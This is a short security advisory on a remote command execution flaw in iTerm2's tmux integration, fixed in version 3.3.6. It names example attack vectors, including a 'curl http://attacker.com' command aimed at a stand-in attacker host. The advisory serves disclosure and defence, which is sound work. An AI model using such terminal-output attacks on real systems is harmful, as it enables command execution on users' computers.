Allele Security Alert
Remote command execution via output to the terminal
iTerm2 versions before 3.3.6
iTerm2 version 3.3.6
Proof of concept
During the audit, Radically Open Security identified a critical vulnerability in the tmux integration feature of iTerm2. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.
Stefan Grönke and Fabian Freyer (Radically Open Security)
Important security update — please upgrade!
Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit
Do not send server-controlled values in tmux integration mode.
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: October 9, 2019